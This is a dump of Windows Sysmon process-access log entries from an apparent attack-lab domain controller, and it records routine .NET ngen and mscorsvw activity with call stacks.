13:23:59.206{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1A03-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.190{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1903-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.174{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1903-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.174{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1903-000000009A01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.159{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1803-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.159{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1803-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.159{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1803-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.143{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1703-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.128{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1703-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.128{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1703-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.112{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1603-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.112{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1603-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.112{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1603-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.096{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1503-000000009A01}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.081{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1503-000000009A01}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.081{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1503-000000009A01}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.065{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1403-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.049{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1403-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.049{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1403-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.034{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.034{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1303-000000009A01}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.034{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1303-000000009A01}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\K